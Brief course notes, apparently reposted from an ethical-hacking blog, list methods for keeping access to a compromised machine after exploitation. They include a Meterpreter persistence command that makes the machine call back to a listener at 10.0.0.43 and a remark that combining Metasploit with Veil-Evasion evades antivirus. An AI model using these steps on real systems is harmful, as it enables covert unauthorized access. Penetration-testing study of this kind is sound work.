MAINTAINING ACCESS - Methods
1. Using a veil-evasion
2. Using persistence module
run persistence -U -i 20 -p 80 -r 10.0.0.43
3. Using Metasploit + veil-evasion -> More robust + undetectable by Antivirus
Ethical Hacking - POST EXPLOITATION(2)
原文:https://www.cnblogs.com/keepmoving1113/p/12270080.html